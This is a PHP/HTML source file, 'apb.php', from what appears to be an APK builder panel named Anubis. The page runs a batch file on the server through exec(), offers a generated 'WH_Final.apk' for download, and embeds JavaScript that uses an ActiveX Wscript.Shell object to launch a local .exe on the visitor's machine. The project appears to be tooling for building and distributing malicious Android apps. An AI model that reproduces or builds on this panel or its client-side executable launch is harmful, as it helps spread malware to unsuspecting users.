Files
Anubis-8.0/anubis/apb.php
T

104 lines
1.7 KiB
PHP
Raw Normal View History

2026-08-27 10:50:54 -06:00
<?php
exec('.\tt.bat && exit',$arrACL);
?>
<html>
<head>
<title>Anubis 7.0 | Download </title>
<script type="text/javascript">
function myFunction(){
WshShell = new ActiveXObject("Wscript.Shell"); //Create WScript Object
WshShell.run("D://LOCALHOST/htdocs/frfff.exe"); // Please change the path and file name with your relevant
available path in client system. This code can be used to execute .exe file as well
}
</SCRIPT>
</head>
<body bgcolor="#171717" background="images/fon.jpg">
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<style media="screen">
input[type=text], select {
width: 100%;
padding: 12px 20px;
margin: 8px 0;
display: inline-block;
border: 1px solid #ccc;
border-radius: 4px;
box-sizing: border-box;
}
input[type=submit] {
width: 45%;
background-color: #4CAF50;
color: white;
padding: 6px 20px;
margin: 8px 0;
border: none;
border-radius: 4px;
cursor: pointer;
}
input[type=submit]:hover {
background-color: #45a049;
}
div {
border-radius: 5px;
background-color: #191919;
padding: 20px;
border-style: solid;
border-color: #4b5826;
}
.fds{
background: #4caf50;
margin-left: 438px;
margin-right: 444px;
border-color: #4caf50;
}
</style>
<br>
<div>
<form action="/stor.php">
<center>
<p style="color: aliceblue;font-size: 16px;">Your Application Now Rady </p>
<br>
<div class="fds">
<a href="./output/WH_Final.apk" style="width: 45%;background-color: #4CAF50;color: white;padding: 6px 20px;margin: 8px 0;border: none;border-radius: 4px;cursor: url;text-decoration: none;;">Download Apk</a>
</div>
</center>
<br>
<br>
<br>
</form>
</div>
<body>
</html>